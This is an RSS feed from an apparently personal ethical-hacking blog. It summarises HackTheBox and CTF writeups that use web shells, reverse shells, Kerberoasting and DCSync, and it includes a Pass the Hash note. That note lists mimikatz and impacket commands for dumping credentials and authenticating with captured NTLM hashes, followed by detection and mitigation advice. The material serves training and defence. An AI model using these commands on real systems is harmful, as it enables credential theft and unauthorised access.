<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>ethicalhacker.tech</title>
		<link>https://ethicalhacker.tech/</link>
		<description>Recent content on ethicalhacker.tech</description>
		<generator>Hugo</generator>
		<language>en-GB</language>
		
		
		
		
			<lastBuildDate>Wed, 07 May 2025 20:24:00 +0100</lastBuildDate>
		
			<atom:link href="https://ethicalhacker.tech/index.xml" rel="self" type="application/rss+xml" />
			<item>
				<title>HackTheBox - Dog Writeup</title>
				<link>https://ethicalhacker.tech/posts/dog/</link>
				<pubDate>Wed, 07 May 2025 20:24:00 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/dog/</guid>
				<description>&lt;p&gt;This machine is an easy rated Linux machine. This writeup will demonstrate how I was able to run commands in the context of the root user. This box involves reading sensitive data found in an exposed git repository leading to access to an admin user on BackdropCMS. With these privileges we are able to find an exploit that allows us to build a malicious module in the form of a web shell. This is used to gain an initial foothold with a reverse shell. Taking a list of users and reusing the password we have will allow logging in as the user johncusack. After accessing this account and observing the sudo permissions, it is seen that it can run a binary called &lt;code&gt;bee&lt;/code&gt; with sudo permission. Using this tool with sudo access allows an attacker to run commands in the context of the root user.&lt;/p&gt;</description>
			</item>
			<item>
				<title>HackTheBox - Administrator Writeup</title>
				<link>https://ethicalhacker.tech/posts/administrator/</link>
				<pubDate>Mon, 05 May 2025 19:27:25 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/administrator/</guid>
				<description>&lt;p&gt;This machine is a retired medium rated Windows box. We are given the credentials to a user account that will give us our initial foothold. After our initial scanning we can see the services that are running and we get an easy access point using the olivia account over WinRM. Following on from here, we will need to use SharpHound as a collector for Bloodhound and do some AD enumeration. This will become important as we will need to come back to refer to it several times. In this box we will see the abuse of GenericAll, ForceChangePassword, GenericWrite, Kerberoasting, and DCSync for our AD attack vectors. We will also see some cracking of a password manager file in a psafe3 format. This box required quite a few user pivots before getting to the domain administrator.&lt;/p&gt;</description>
			</item>
			<item>
				<title>HackTheBox - Monitored Writeup</title>
				<link>https://ethicalhacker.tech/posts/monitored/</link>
				<pubDate>Fri, 26 Jul 2024 16:13:25 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/monitored/</guid>
				<description>&lt;p&gt;Monitored is a medium rated retired Linux machine on HackTheBox. In this walkthough I demonstrate how I was able to obtain root access to this machine. This box will require you to use SNMP to get credentials for a disabled account. You will then need to abuse the API to get an authentication token. Next, find the right CVE to steal the administrator&amp;rsquo;s API key. With this key you can start adding users with admin access. Built in functionality can be abused to get a reverse shell. With this reverse shell you can then escalate your privileges by abusing the sudo permissions provided to the user account.&lt;/p&gt;</description>
			</item>
			<item>
				<title>HackTheBox - PermX Writeup</title>
				<link>https://ethicalhacker.tech/posts/permx/</link>
				<pubDate>Mon, 08 Jul 2024 08:38:02 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/permx/</guid>
				<description>&lt;p&gt;PermX is an easy rated Linux machine from week 12 of HackTheBox season 5 &amp;ldquo;Anomalies&amp;rdquo;. In this walkthrough, I will demonstrate how I was able to obtain root access to this machine. This box was a standard easy rated box with a privilege escalation vector that required a bit of thinking. Subdomain enumeration uncovers a Chamilo LMS instance vulnerable to CVE-2023-4226, allowing unauthenticated file upload and a reverse shell as www-data. Linpeas reveals credentials in a Chamilo config file, granting SSH access as mtz. A sudoable script using setfacl is abused via a symbolic link to /etc/sudoers, granting mtz unrestricted sudo and root access.&lt;/p&gt;</description>
			</item>
			<item>
				<title>HackTheBox - Blazorized Writeup</title>
				<link>https://ethicalhacker.tech/posts/blazorized/</link>
				<pubDate>Sun, 07 Jul 2024 09:06:44 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/blazorized/</guid>
				<description>&lt;p&gt;Blazorized was a medium rated Windows machine from week 11 of HackTheBox season 5 &amp;ldquo;Anomalies&amp;rdquo;. This rating was later changed to hard when it was retired. In this walkthrough, I will demonstrate how I was able to obtain root access to this machine. This box proved to be quite difficult for me and required very good enumeration.&lt;/p&gt;&#xA;&lt;p&gt;Blazorized is a machine running Windows and is functioning as a domain controller. On this machine, we find a Blazor .NET WASM application. We are able to obtain a DLL, use AvaloniaILSpy to read the contents of it, and write a Python script to create a &amp;ldquo;superadmin&amp;rdquo; JWT and access the admin area of the website. From here we will see that we can abuse a SQL injection vulnerability to gain a reverse shell. We then abuse a WriteSPN privilege to pivot to another user using a Kerberoast attack. We will then pivot into another user account by abusing permissions to write a login script that will trigger a reverse shell. Finally, we will use the abuse a DCSync privilege using mimikatz to dump out the administrator&amp;rsquo;s NTLM hash and get a shell as the administrator.&lt;/p&gt;</description>
			</item>
			<item>
				<title>DamCTF24 - Writeup</title>
				<link>https://ethicalhacker.tech/posts/damctf24/</link>
				<pubDate>Sun, 07 Apr 2024 22:57:03 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/damctf24/</guid>
				<description>&lt;p&gt;These writeups are for the OSINT challenges I solved while competing in &lt;a href=&#34;https://ctftime.org/event/2262&#34;&gt;DamCTF 2024&lt;/a&gt; with my team, &lt;a href=&#34;https://ctftime.org/team/287833&#34;&gt;Bonzi_Brigade&lt;/a&gt;. This event took place from 06th April - 08th April. Our team scored 1380 points in total and came 27th out of 207 teams.&lt;/p&gt;&#xA;&lt;h1 id=&#34;asparagus&#34;&gt;asparagus?&lt;/h1&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;&lt;strong&gt;Authors:&lt;/strong&gt; alienfoetus, WholeWheatBagels&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Solves:&lt;/strong&gt; 44&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Last spring break, we took a short trip to see these special flowers! Can you find where we were?&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Challenge image:&lt;/strong&gt;&#xA;&lt;img src=&#34;https://ethicalhacker.tech/images/damctf/asparagus/flowers.jpg&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;Since the framing of the challenge is the Oregon State University students going on a trip for spring break, I assumed that they would still be in Oregon. I started off by searching for wild purple flowers in Oregon. The ones shown in the screenshot below look to be similar to those found in the provided picture:&lt;/p&gt;</description>
			</item>
			<item>
				<title>UTCTF 2024 - Writeups</title>
				<link>https://ethicalhacker.tech/posts/utctf24/</link>
				<pubDate>Wed, 03 Apr 2024 21:38:20 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/utctf24/</guid>
				<description>&lt;p&gt;These writeups are for the OSINT challenges I solved while competing in &lt;a href=&#34;https://ctftime.org/event/2302&#34;&gt;UTCTF 2024&lt;/a&gt; with my team, &lt;a href=&#34;https://ctftime.org/team/287833&#34;&gt;Bonzi_Brigade&lt;/a&gt;. This event took place from 30th March - 01st April. Our team scored 4045 points in total and came 135th our of 854 teams.&lt;/p&gt;&#xA;&lt;h1 id=&#34;osint-1&#34;&gt;OSINT 1&lt;/h1&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;&lt;strong&gt;Author:&lt;/strong&gt; mzone (@mzone on discord)&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Solves:&lt;/strong&gt; 202&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; It seems like companies have document leaks all the time nowadays. I wonder if this company has any. (NOTE: It turns out there&amp;rsquo;s also an actual company named Kakuu in Japan. The real company is not in scope. Please don&amp;rsquo;t try and hack them.)&lt;/p&gt;</description>
			</item>
			<item>
				<title>About</title>
				<link>https://ethicalhacker.tech/about/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/about/</guid>
				<description>&lt;div class=&#34;section-head&#34;&gt;&#xA;  &lt;span class=&#34;section-head-label&#34;&gt;Background&lt;/span&gt;&#xA;  &lt;div class=&#34;section-head-line&#34;&gt;&lt;/div&gt;&#xA;&lt;/div&gt;&#xA;&lt;p class=&#34;about-p&#34;&gt;Hi, I&#39;m &lt;span class=&#34;accent&#34;&gt;Kyle&lt;/span&gt;. I&#39;ve been interested in computers since I was a teenager, like many others this started with gaming. This led me to programming and networking. What started as curiosity turned into a computer science degree and a cyber security career. In my professional work, I am a member of a Red Team carrying out offensive security engagements. In my spare time, I like to work on my home lab environment, continue to develop my offensive security skills in my home lab or on platforms like HackTheBox, and I still play videogames when time permits.&lt;/p&gt;</description>
			</item>
			<item>
				<title>Kerberoasting</title>
				<link>https://ethicalhacker.tech/notes/kerberoasting/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/notes/kerberoasting/</guid>
				<description>&lt;h2 id=&#34;what-is-it&#34;&gt;what is it?&lt;/h2&gt;&#xA;&lt;p&gt;Kerberoasting is an Active Directory attack that allows any authenticated domain user to request Kerberos service tickets (TGS) for accounts that have a Service Principal Name (SPN) set. Those tickets are encrypted with the service account&amp;rsquo;s NTLM hash, meaning they can be taken offline and cracked without any further interaction with the domain controller.&lt;/p&gt;&#xA;&lt;p&gt;The attack is particularly effective because SPNs are often set on service accounts with weak passwords, and requesting a TGS is a normal, logged operation that blends in with everyday traffic.&lt;/p&gt;</description>
			</item>
			<item>
				<title>Pass the Hash</title>
				<link>https://ethicalhacker.tech/notes/pass-the-hash/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/notes/pass-the-hash/</guid>
				<description>&lt;h2 id=&#34;what-is-it&#34;&gt;what is it?&lt;/h2&gt;&#xA;&lt;p&gt;Pass the Hash (PtH) is a technique that uses a captured NTLM hash to authenticate as a user without knowing their plaintext password. Because NTLM authentication uses the hash directly as a credential, an attacker with a valid hash can authenticate to any service that accepts NTLM — SMB, WMI, RDP (in some configs), and more.&lt;/p&gt;&#xA;&lt;h2 id=&#34;requirements&#34;&gt;requirements&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;A captured NTLM hash (from mimikatz, secretsdump, or similar)&lt;/li&gt;&#xA;&lt;li&gt;Network access to the target&lt;/li&gt;&#xA;&lt;li&gt;Target must accept NTLM authentication (most Windows environments do)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;attack-steps&#34;&gt;attack steps&lt;/h2&gt;&#xA;&lt;h3 id=&#34;1-obtain-a-hash&#34;&gt;1. obtain a hash&lt;/h3&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;1&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# dump from lsass on a compromised host&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;2&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;mimikatz &lt;span class=&#34;c1&#34;&gt;# sekurlsa::logonpasswords&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;3&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;4&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# remote dump via impacket&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;5&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;secretsdump.py domain/user:password@10.0.0.5&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id=&#34;2-authenticate-with-the-hash&#34;&gt;2. authenticate with the hash&lt;/h3&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;1&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# psexec with hash&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;2&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;psexec.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;3&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;4&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# wmiexec&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;5&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;wmiexec.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;6&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;7&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# smbclient&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;8&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;smbclient.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;detection&#34;&gt;detection&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Event ID &lt;strong&gt;4624&lt;/strong&gt; logon type 3 (network) with NTLM authentication where Kerberos would be expected&lt;/li&gt;&#xA;&lt;li&gt;Mismatched workstation names or unusual source IPs for privileged accounts&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;mitigation&#34;&gt;mitigation&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Enable &lt;strong&gt;Protected Users&lt;/strong&gt; security group — prevents NTLM auth for member accounts&lt;/li&gt;&#xA;&lt;li&gt;Disable NTLM where possible via GPO (&lt;code&gt;Network security: Restrict NTLM&lt;/code&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Use &lt;strong&gt;Credential Guard&lt;/strong&gt; to protect lsass from memory reads&lt;/li&gt;&#xA;&lt;li&gt;Enforce tiered administration to limit where privileged hashes are cached&lt;/li&gt;&#xA;&lt;/ul&gt;</description>
			</item>
			<item>
				<title>search</title>
				<link>https://ethicalhacker.tech/search/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/search/</guid>
				<description></description>
			</item>
	</channel>
</rss>
